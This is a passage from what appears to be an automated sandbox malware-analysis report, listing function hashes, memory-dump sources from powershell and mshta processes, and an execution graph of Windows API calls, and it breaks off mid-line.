                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4021F167B084665FD30277EDBC209D8A780DB9437674802B3D368CB543D914709B8BCA
                                                                                                                                                                                                                                      Function 00007FFD98C386FA Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: N_^$N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                      • API String ID: 0-1162251571
                                                                                                                                                                                                                                      • Opcode ID: fabe0376f1128ec4eb520b6a8ae85e6c3b314c430e84815edeea17b3bb8dac87
                                                                                                                                                                                                                                      • Instruction ID: bc6809a7dcb282276c473df08714feeb7456a5e390c5869b2df9c73f6ad729d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fabe0376f1128ec4eb520b6a8ae85e6c3b314c430e84815edeea17b3bb8dac87
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E831B5A3E0E6CA1FE7275BB85C750D93FD0EF22608B0A00F7D5948A093FD292407820B
                                                                                                                                                                                                                                      Function 00007FFD98C3897C Relevance: 5.1, Strings: 4, Instructions: 123COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                      • API String ID: 0-3900292545
                                                                                                                                                                                                                                      • Opcode ID: 59de52242f84f6dd98716c2ac6004c00a094ef74341dcc058ea40de1106d6b02
                                                                                                                                                                                                                                      • Instruction ID: ea78967cc3d05942fb6338a4f1477e7e5fe1c9cba041673b5e04e1c4da1caf2a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59de52242f84f6dd98716c2ac6004c00a094ef74341dcc058ea40de1106d6b02
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 664183A2A0E6C64FE32757794C7A199BFA0EF62318B4A41F7C0999F0D3EE1914078357

                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                      Function 000002C8DC510FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000003.1773774556.000002C8DC510000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002C8DC510000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_3_2c8dc510000_mshta.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                      • Instruction ID: 3ba90de908cade9da4b1356683db2a294dfaaae7ade45a542dd755bc57e96eed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 719002084A580655E41411A10D4E65C655073C8190FD48580951790184D84D02971352

                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                      Function 00007FFD98D117D9 Relevance: .8, Instructions: 786COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000002A.00000002.1924229527.00007FFD98D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98D10000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_42_2_7ffd98d10000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a34ec4737735dd4f1b495e27a7f7e8e596db393084c71361410ae80cfe3d26b3
                                                                                                                                                                                                                                      • Instruction ID: 7295b8c8e4a1775cc89165e87479394148af65bcc76f80fd228da2d28de0eae8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a34ec4737735dd4f1b495e27a7f7e8e596db393084c71361410ae80cfe3d26b3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF325722B0DBC90FEBAA9B6858615B57FE1DF46611B4811FFD09DC71D3DE08A80AC345
                                                                                                                                                                                                                                      Function 00007FFD98C44DD3 Relevance: .2, Instructions: 223COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000002A.00000002.1922892323.00007FFD98C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_42_2_7ffd98c40000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8f2b8a5f9ad153f807c9050d211c8548660b49a23fd0da1b954eddc8d8937c16
                                                                                                                                                                                                                                      • Instruction ID: 46fc2c5fa89b4b326e888a0be0b1e775bbaf6f8cf51c159562ee69f84a6c87d9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f2b8a5f9ad153f807c9050d211c8548660b49a23fd0da1b954eddc8d8937c16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8361F531E09A4C5FDB54DFACD8656ECBBF1EF4A310F5441AED049D7292CA35A842CB40
                                                                                                                                                                                                                                      Function 00007FFD98D10AA4 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000002A.00000002.1924229527.00007FFD98D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98D10000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_42_2_7ffd98d10000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 09091f22f07d9f24994d87aa4363dd5e122e76606218555609dc2aa4873ec426
                                                                                                                                                                                                                                      • Instruction ID: 97656dff81d638345f6b590863dcbf7ef6621690180ffe0356beb5ae086e4df7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09091f22f07d9f24994d87aa4363dd5e122e76606218555609dc2aa4873ec426
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E210333B0DA590FEBB9A69C68256B873D0EF54B21B9811BBD05DC3093DD19AC0A83C5
                                                                                                                                                                                                                                      Function 00007FFD98C43945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000002A.00000002.1922892323.00007FFD98C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_42_2_7ffd98c40000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                      • Instruction ID: 2048e8d23d6adaae327089f70b499e6805f99f0127ceaea11169a6f95f713a49
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E01677121CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3695D636E881CB46

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:7.9%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:0.5%
                                                                                                                                                                                                                                      Total number of Nodes:1180
                                                                                                                                                                                                                                      Total number of Limit Nodes:37
                                                                                                                                                                                                                                      execution_graph 38244 7ff69a3e3b53 38245 7ff69a3e3b64 38244->38245 38295 7ff69a401e80 38245->38295 38246 7ff69a3e3c09 38307 7ff69a4023f0 38246->38307 38248 7ff69a3e3c18 38317 7ff69a3e8050 157 API calls 38248->38317 38249 7ff69a3e3bb6 38249->38246 38249->38248 38252 7ff69a3e3c01 38249->38252 38251 7ff69a3e3c90 38334 7ff69a42d400 48 API calls 38251->38334 38312 7ff69a401c24 38252->38312 38253 7ff69a3e3c3d 38318 7ff69a3e8010 13 API calls 38253->38318 38256 7ff69a3e3ccc 38256->38251 38325 7ff69a402414 61 API calls 38256->38325 38259 7ff69a3e3c54 38320 7ff69a3ea9d4 186 API calls wcschr 38259->38320 38260 7ff69a3e3c45 38260->38259 38319 7ff69a3fcba8 75 API calls 38260->38319 38261 7ff69a3e3cf9 38326 7ff69a401998 138 API calls 38261->38326 38265 7ff69a3e3d10 38327 7ff69a4018ac 38265->38327 38266 7ff69a3e3c5c 38321 7ff69a3e93ac 8 API calls 38266->38321 38269 7ff69a3e3c66 38271 7ff69a3e3c77 38269->38271 38322 7ff69a3fca40 61 API calls _CxxThrowException 38269->38322 38323 7ff69a3e8090 8 API calls 38271->38323 38274 7ff69a3e3c7f 38274->38251 38324 7ff69a3fca40 61 API calls _CxxThrowException 38274->38324 38296 7ff69a401e95 setbuf 38295->38296 38297 7ff69a401ecb CreateFileW 38296->38297 38298 7ff69a401fb8 38297->38298 38299 7ff69a401f59 GetLastError 38297->38299 38300 7ff69a401ff7 38298->38300 38302 7ff69a401fd9 SetFileTime 38298->38302 38335 7ff69a414534 38299->38335 38347 7ff69a43a610 38300->38347 38302->38300 38305 7ff69a401f78 CreateFileW GetLastError 38305->38298 38361 7ff69a4024e8 38307->38361 38310 7ff69a40240e 38310->38256 38313 7ff69a401c3b 38312->38313 38314 7ff69a401c37 38312->38314 38313->38314 38315 7ff69a401c5d 38313->38315 38314->38246 38378 7ff69a402d6c 12 API calls 2 library calls 38315->38378 38317->38253 38318->38260 38320->38266 38321->38269 38322->38271 38323->38274 38324->38251 38325->38261 38326->38265 38328 7ff69a4018db 38327->38328 38329 7ff69a4018ca 38327->38329 38328->38251 38329->38328 38330 7ff69a4018de 38329->38330 38331 7ff69a4018d6 38329->38331 38379 7ff69a401930 38330->38379 38332 7ff69a401c24 12 API calls 38331->38332 38332->38328 38336 7ff69a414549 setbuf 38335->38336 38346 7ff69a4145a2 38336->38346 38356 7ff69a41472c CharUpperW 38336->38356 38338 7ff69a43a610 _UnwindNestedFrames 8 API calls 38340 7ff69a401f74 38338->38340 38339 7ff69a414579 38357 7ff69a414760 CharUpperW 38339->38357 38340->38298 38340->38305 38342 7ff69a414592 38343 7ff69a414629 GetCurrentDirectoryW 38342->38343 38344 7ff69a41459a 38342->38344 38343->38346 38358 7ff69a41472c CharUpperW 38344->38358 38346->38338 38348 7ff69a43a61a 38347->38348 38349 7ff69a40203a 38348->38349 38350 7ff69a43a6a0 IsProcessorFeaturePresent 38348->38350 38349->38249 38351 7ff69a43a6b7 38350->38351 38359 7ff69a43a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38351->38359 38353 7ff69a43a6ca 38360 7ff69a43a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38353->38360 38356->38339 38357->38342 38358->38346 38359->38353 38367 7ff69a401af0 38361->38367 38364 7ff69a4023f9 38364->38310 38366 7ff69a3fca40 61 API calls _CxxThrowException 38364->38366 38366->38310 38368 7ff69a401b01 setbuf 38367->38368 38369 7ff69a401b6f CreateFileW 38368->38369 38370 7ff69a401b68 38368->38370 38369->38370 38371 7ff69a401be1 38370->38371 38372 7ff69a414534 10 API calls 38370->38372 38375 7ff69a43a610 _UnwindNestedFrames 8 API calls 38371->38375 38373 7ff69a401bb3 38372->38373 38373->38371 38374 7ff69a401bb7 CreateFileW 38373->38374 38374->38371 38376 7ff69a401c14 38375->38376 38376->38364 38377 7ff69a3fca08 10 API calls 38376->38377 38377->38364 38378->38314 38380 7ff69a40194c 38379->38380 38381 7ff69a401964 38379->38381 38380->38381 38383 7ff69a401958 CloseHandle 38380->38383 38382 7ff69a401988 38381->38382 38385 7ff69a3fc9d0 10 API calls 38381->38385 38382->38328 38383->38381 38385->38382 38386 7ff69a3e1884 38518 7ff69a4134e4 38386->38518 38389 7ff69a3e1926 38391 7ff69a3e195b 38389->38391 38582 7ff69a413f98 63 API calls 2 library calls 38389->38582 38390 7ff69a4134e4 CompareStringW 38392 7ff69a3e18a6 38390->38392 38398 7ff69a3e1970 38391->38398 38583 7ff69a402ed8 100 API calls 3 library calls 38391->38583 38395 7ff69a4134e4 CompareStringW 38392->38395 38400 7ff69a3e18b9 38392->38400 38395->38400 38397 7ff69a3e1915 38581 7ff69a3fca40 61 API calls _CxxThrowException 38397->38581 38401 7ff69a3e19b8 38398->38401 38584 7ff69a4249f4 48 API calls 38398->38584 38400->38389 38580 7ff69a3e1168 8 API calls 2 library calls 38400->38580 38522 7ff69a3e5450 38401->38522 38403 7ff69a3e19b0 38585 7ff69a3f8444 54 API calls fflush 38403->38585 38409 7ff69a3e72c4 76 API calls 38416 7ff69a3e1a12 38409->38416 38410 7ff69a3e1b04 38560 7ff69a3f6c94 38410->38560 38411 7ff69a3e1ae6 38556 7ff69a3e7514 38411->38556 38414 7ff69a3e1af2 38415 7ff69a3e7514 72 API calls 38414->38415 38417 7ff69a3e1aff 38415->38417 38416->38410 38416->38411 38419 7ff69a43a610 _UnwindNestedFrames 8 API calls 38417->38419 38418 7ff69a3e1b13 38576 7ff69a3e7148 38418->38576 38420 7ff69a3e2f97 38419->38420 38422 7ff69a3e1c71 38423 7ff69a3e1ca7 38422->38423 38424 7ff69a3e63e8 8 API calls 38422->38424 38425 7ff69a3e1cd5 38423->38425 38426 7ff69a3e1ce4 38423->38426 38427 7ff69a3e1c91 38424->38427 38430 7ff69a43a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38425->38430 38428 7ff69a43a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38426->38428 38429 7ff69a3e49b8 99 API calls 38427->38429 38434 7ff69a3e1cee 38428->38434 38431 7ff69a3e1c9d 38429->38431 38430->38434 38432 7ff69a3e63e8 8 API calls 38431->38432 38432->38423 38433 7ff69a3e1d50 38436 7ff69a43a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38433->38436 38434->38433 38435 7ff69a42de30 72 API calls 38434->38435 38435->38433 38437 7ff69a3e1d62 38436->38437 38438 7ff69a42dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38437->38438 38439 7ff69a3e1d7b 38437->38439 38438->38439 38440 7ff69a432bcc 66 API calls 38439->38440 38441 7ff69a3e1dba 38440->38441 38517 7ff69a40ae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38441->38517 38442 7ff69a3e1e1c 38444 7ff69a3e10c0 8 API calls 38442->38444 38446 7ff69a3e1e5d 38442->38446 38443 7ff69a3e1dde std::bad_alloc::bad_alloc 38443->38442 38445 7ff69a43ba34 _CxxThrowException RtlPcToFileHeader RaiseException 38443->38445 38444->38446 38445->38442 38447 7ff69a3ea410 159 API calls 38446->38447 38512 7ff69a3e1ef4 38446->38512 38447->38512 38448 7ff69a3e2ccc 38449 7ff69a3e2d0c 38448->38449 38513 7ff69a408c80 72 API calls 38448->38513 38450 7ff69a42de30 72 API calls 38449->38450 38459 7ff69a3e2d21 38449->38459 38450->38459 38451 7ff69a406688 48 API calls 38451->38512 38452 7ff69a3e2d86 38457 7ff69a4249f4 48 API calls 38452->38457 38493 7ff69a3e2dd0 38452->38493 38453 7ff69a4249f4 48 API calls 38511 7ff69a3e2005 38453->38511 38454 7ff69a3e5e70 169 API calls 38454->38511 38455 7ff69a3f8444 54 API calls 38455->38511 38456 7ff69a3ea504 208 API calls 38456->38493 38460 7ff69a3e2d9e 38457->38460 38458 7ff69a3e80e4 192 API calls 38458->38493 38459->38452 38461 7ff69a4249f4 48 API calls 38459->38461 38463 7ff69a3f8444 54 API calls 38460->38463 38465 7ff69a3e2d6c 38461->38465 38462 7ff69a3e5928 237 API calls 38462->38511 38466 7ff69a3e2da6 38463->38466 38464 7ff69a407c7c 127 API calls 38464->38493 38467 7ff69a4249f4 48 API calls 38465->38467 38475 7ff69a401c24 12 API calls 38466->38475 38468 7ff69a3e2d79 38467->38468 38473 7ff69a3f8444 54 API calls 38468->38473 38469 7ff69a3ee6c8 157 API calls 38469->38512 38470 7ff69a3fe21c 63 API calls 38470->38511 38471 7ff69a3e1168 8 API calls 38471->38493 38472 7ff69a3eb540 147 API calls 38472->38512 38473->38452 38474 7ff69a4065b4 48 API calls 38474->38512 38475->38493 38476 7ff69a3ea4d0 12 API calls 38476->38512 38477 7ff69a404554 16 API calls 38477->38512 38478 7ff69a42ae50 71 API calls 38481 7ff69a3e2e39 38478->38481 38479 7ff69a401998 138 API calls 38479->38512 38480 7ff69a3e33b4 64 API calls 38480->38493 38481->38478 38483 7ff69a3fca40 61 API calls 38481->38483 38481->38493 38482 7ff69a3e5db4 46 API calls 38482->38512 38483->38493 38484 7ff69a3e6188 231 API calls 38484->38493 38485 7ff69a401e80 15 API calls 38485->38512 38486 7ff69a3eb540 147 API calls 38486->38511 38487 7ff69a407c7c 127 API calls 38487->38512 38488 7ff69a401930 11 API calls 38488->38512 38489 7ff69a3e3f74 138 API calls 38489->38493 38490 7ff69a3e571c 12 API calls 38490->38512 38491 7ff69a41ba9c 195 API calls 38491->38493 38492 7ff69a4249f4 48 API calls 38492->38493 38493->38456 38493->38458 38493->38464 38493->38471 38493->38480 38493->38481 38493->38484 38493->38489 38493->38491 38493->38492 38495 7ff69a3f8444 54 API calls 38493->38495 38494 7ff69a3e5004 49 API calls 38494->38512 38495->38493 38496 7ff69a3e1168 8 API calls 38496->38512 38497 7ff69a4018ac 15 API calls 38497->38512 38498 7ff69a42d48c 58 API calls 38498->38512 38499 7ff69a3ea410 159 API calls 38499->38512 38500 7ff69a3e5e70 169 API calls 38500->38512 38501 7ff69a3f9be0 14 API calls 38501->38512 38502 7ff69a42c0a8 10 API calls 38502->38512 38503 7ff69a406378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38503->38512 38504 7ff69a4197f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 38504->38512 38505 7ff69a3fcbd0 75 API calls 38505->38512 38506 7ff69a405c0c 237 API calls 38506->38512 38507 7ff69a405d40 237 API calls 38507->38512 38508 7ff69a42b6d0 73 API calls 38508->38511 38509 7ff69a3e6114 216 API calls 38509->38512 38510 7ff69a405708 237 API calls 38510->38512 38511->38453 38511->38454 38511->38455 38511->38462 38511->38470 38511->38486 38511->38508 38511->38512 38512->38448 38512->38451 38512->38469 38512->38472 38512->38474 38512->38476 38512->38477 38512->38479 38512->38482 38512->38485 38512->38487 38512->38488 38512->38490 38512->38494 38512->38496 38512->38497 38512->38498 38512->38499 38512->38500 38512->38501 38512->38502 38512->38503 38512->38504 38512->38505 38512->38506 38512->38507 38512->38509 38512->38510 38512->38511 38514 7ff69a3f0d60 237 API calls 38512->38514 38515 7ff69a40aae0 237 API calls 38512->38515 38516 7ff69a40a250 237 API calls 38512->38516 38513->38449 38514->38511 38515->38511 38516->38512 38517->38443 38519 7ff69a4134f6 38518->38519 38520 7ff69a3e1893 38519->38520 38586 7ff69a42dac0 CompareStringW 38519->38586 38520->38390 38520->38400 38524 7ff69a3e546f setbuf 38522->38524 38523 7ff69a3e554a __scrt_fastfail 38606 7ff69a42c0a8 GetSystemTime SystemTimeToFileTime 38523->38606 38524->38523 38540 7ff69a3e5588 __scrt_fastfail 38524->38540 38526 7ff69a3e5583 38595 7ff69a3e6eb8 38526->38595 38532 7ff69a3e56e9 38602 7ff69a426f68 38532->38602 38534 7ff69a3e56f6 38535 7ff69a43a610 _UnwindNestedFrames 8 API calls 38534->38535 38536 7ff69a3e19df 38535->38536 38542 7ff69a3e72c4 38536->38542 38540->38526 38587 7ff69a427a24 38540->38587 38610 7ff69a3e3210 26 API calls 38540->38610 38611 7ff69a3f7088 10 API calls 38540->38611 38612 7ff69a3e571c 38540->38612 38620 7ff69a3f4380 14 API calls 38540->38620 38621 7ff69a3e681c 54 API calls 2 library calls 38540->38621 38543 7ff69a3e72eb 38542->38543 38716 7ff69a3f88dc 38543->38716 38545 7ff69a3e7302 38720 7ff69a41915c 38545->38720 38547 7ff69a3e730f 38732 7ff69a417044 38547->38732 38550 7ff69a43a444 new 4 API calls 38551 7ff69a3e73e3 38550->38551 38552 7ff69a3e73f5 __scrt_fastfail 38551->38552 38748 7ff69a40894c 38551->38748 38737 7ff69a3f9be0 38552->38737 38557 7ff69a3e7539 38556->38557 38841 7ff69a41922c 38557->38841 38561 7ff69a3f6d45 38560->38561 38562 7ff69a3f6cbc 38560->38562 38563 7ff69a3f6d83 38561->38563 38565 7ff69a3f6d69 38561->38565 38857 7ff69a419f78 8 API calls 2 library calls 38561->38857 38564 7ff69a3f6cd9 38562->38564 38852 7ff69a419f78 8 API calls 2 library calls 38562->38852 38563->38418 38567 7ff69a3f6cf3 38564->38567 38853 7ff69a419f78 8 API calls 2 library calls 38564->38853 38565->38563 38858 7ff69a419f78 8 API calls 2 library calls 38565->38858 38571 7ff69a3f6d0d 38567->38571 38854 7ff69a419f78 8 API calls 2 library calls 38567->38854 38572 7ff69a3f6d2b 38571->38572 38855 7ff69a419f78 8 API calls 2 library calls 38571->38855 38572->38563 38856 7ff69a419f78 8 API calls 2 library calls 38572->38856 38577 7ff69a3e7162 38576->38577 38578 7ff69a3e7167 38576->38578 38859 7ff69a3e6c64 130 API calls _UnwindNestedFrames 38577->38859 38580->38397 38581->38389 38582->38391 38583->38398 38584->38403 38585->38401 38586->38520 38589 7ff69a427a59 38587->38589 38592 7ff69a427a4f 38587->38592 38588 7ff69a427a7c 38654 7ff69a42b6d0 73 API calls _Init_thread_footer 38588->38654 38589->38588 38589->38592 38593 7ff69a427b1c 60 API calls 38589->38593 38622 7ff69a4271fc 38589->38622 38655 7ff69a3f41b0 14 API calls 2 library calls 38589->38655 38592->38540 38593->38589 38596 7ff69a3e6f5c 38595->38596 38597 7ff69a3e6ee6 38595->38597 38596->38532 38705 7ff69a429f64 8 API calls __BuildCatchObjectHelper 38597->38705 38599 7ff69a3e6efb 38599->38596 38600 7ff69a3e6f2f 38599->38600 38600->38599 38706 7ff69a3e7188 12 API calls 38600->38706 38603 7ff69a426f8a 38602->38603 38604 7ff69a426fb4 38602->38604 38603->38604 38605 7ff69a404538 FindClose 38603->38605 38605->38603 38607 7ff69a43a610 _UnwindNestedFrames 8 API calls 38606->38607 38608 7ff69a3e5576 38607->38608 38609 7ff69a3e681c 54 API calls 2 library calls 38608->38609 38609->38526 38610->38540 38611->38540 38613 7ff69a3e5742 38612->38613 38618 7ff69a3e575d 38612->38618 38613->38618 38711 7ff69a413520 12 API calls 2 library calls 38613->38711 38617 7ff69a3e57fc 38617->38540 38707 7ff69a413610 38618->38707 38620->38540 38621->38540 38627 7ff69a427217 setbuf 38622->38627 38624 7ff69a43a610 _UnwindNestedFrames 8 API calls 38625 7ff69a42776f 38624->38625 38625->38589 38639 7ff69a42725a 38627->38639 38640 7ff69a42729c 38627->38640 38650 7ff69a4273c5 38627->38650 38669 7ff69a404554 38627->38669 38628 7ff69a427453 38631 7ff69a427476 38628->38631 38632 7ff69a427464 38628->38632 38630 7ff69a4276ef 38630->38639 38680 7ff69a408558 10 API calls 2 library calls 38630->38680 38634 7ff69a427496 38631->38634 38666 7ff69a404538 38631->38666 38677 7ff69a427c38 55 API calls 3 library calls 38632->38677 38634->38639 38646 7ff69a404554 16 API calls 38634->38646 38635 7ff69a427342 38635->38630 38635->38639 38651 7ff69a427656 38635->38651 38678 7ff69a3f4380 14 API calls 38635->38678 38636 7ff69a427471 38636->38631 38639->38624 38641 7ff69a4273bb 38640->38641 38643 7ff69a42732e 38640->38643 38656 7ff69a43a444 38641->38656 38643->38635 38645 7ff69a42734a 38643->38645 38645->38639 38649 7ff69a42737e 38645->38649 38675 7ff69a3f4380 14 API calls 38645->38675 38646->38639 38649->38639 38676 7ff69a3fcbd0 75 API calls 38649->38676 38662 7ff69a4045cc 38650->38662 38651->38630 38651->38639 38651->38651 38652 7ff69a427723 38651->38652 38679 7ff69a3ec214 8 API calls 2 library calls 38652->38679 38655->38589 38657 7ff69a43a44f 38656->38657 38658 7ff69a43a47a 38657->38658 38681 7ff69a4436c0 38657->38681 38684 7ff69a43b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38657->38684 38685 7ff69a43b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38657->38685 38658->38650 38663 7ff69a4045ed 38662->38663 38664 7ff69a4046ec 15 API calls 38663->38664 38665 7ff69a4046b2 38663->38665 38664->38663 38665->38628 38665->38635 38667 7ff69a40454f 38666->38667 38668 7ff69a404549 FindClose 38666->38668 38667->38634 38668->38667 38670 7ff69a404570 38669->38670 38674 7ff69a404574 38670->38674 38692 7ff69a4046ec 38670->38692 38673 7ff69a40458d FindClose 38673->38674 38674->38640 38675->38649 38676->38639 38677->38636 38678->38651 38679->38639 38680->38639 38686 7ff69a443700 38681->38686 38691 7ff69a446938 EnterCriticalSection 38686->38691 38688 7ff69a44370d 38689 7ff69a446998 fflush LeaveCriticalSection 38688->38689 38690 7ff69a4436d2 38689->38690 38690->38657 38693 7ff69a404705 setbuf 38692->38693 38694 7ff69a4047a4 FindNextFileW 38693->38694 38695 7ff69a404733 FindFirstFileW 38693->38695 38696 7ff69a4047ae GetLastError 38694->38696 38704 7ff69a40478b 38694->38704 38697 7ff69a404749 38695->38697 38695->38704 38696->38704 38698 7ff69a414534 10 API calls 38697->38698 38700 7ff69a40475b 38698->38700 38699 7ff69a43a610 _UnwindNestedFrames 8 API calls 38701 7ff69a404587 38699->38701 38702 7ff69a40475f FindFirstFileW 38700->38702 38703 7ff69a40477a GetLastError 38700->38703 38701->38673 38701->38674 38702->38703 38702->38704 38703->38704 38704->38699 38705->38599 38706->38600 38708 7ff69a413626 setbuf wcschr 38707->38708 38709 7ff69a43a610 _UnwindNestedFrames 8 API calls 38708->38709 38710 7ff69a3e57e1 38709->38710 38710->38617 38712 7ff69a4148bc 38710->38712 38711->38618 38713 7ff69a4148cb setbuf 38712->38713 38714 7ff69a43a610 _UnwindNestedFrames 8 API calls 38713->38714 38715 7ff69a41493a 38714->38715 38715->38617 38717 7ff69a3f8919 38716->38717 38753 7ff69a424b14 38717->38753 38719 7ff69a3f8954 __scrt_fastfail 38719->38545 38721 7ff69a419199 38720->38721 38758 7ff69a43a480 38721->38758 38724 7ff69a43a444 new 4 API calls 38725 7ff69a4191cf 38724->38725 38726 7ff69a4191e1 38725->38726 38727 7ff69a3f88dc 8 API calls 38725->38727 38728 7ff69a43a444 new 4 API calls 38726->38728 38727->38726 38729 7ff69a4191f7 38728->38729 38730 7ff69a419209 38729->38730 38731 7ff69a3f88dc 8 API calls 38729->38731 38730->38547 38731->38730 38733 7ff69a3f88dc 8 API calls 38732->38733 38734 7ff69a417063 38733->38734 38766 7ff69a4172c0 38734->38766 38770 7ff69a3f901c CryptAcquireContextW 38737->38770 38741 7ff69a3f9c2a 38780 7ff69a429ce4 38741->38780 38745 7ff69a3f9c5b __BuildCatchObjectHelper 38746 7ff69a43a610 _UnwindNestedFrames 8 API calls 38745->38746 38747 7ff69a3e1a01 38746->38747 38747->38409 38797 7ff69a427d80 38748->38797 38754 7ff69a424b26 38753->38754 38755 7ff69a424b2b 38753->38755 38757 7ff69a424b38 8 API calls _UnwindNestedFrames 38754->38757 38755->38719 38757->38755 38759 7ff69a43a444 38758->38759 38760 7ff69a4191be 38759->38760 38761 7ff69a4436c0 new 2 API calls 38759->38761 38764 7ff69a43b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38759->38764 38765 7ff69a43b2f4 RtlPcToFileHeader RaiseException 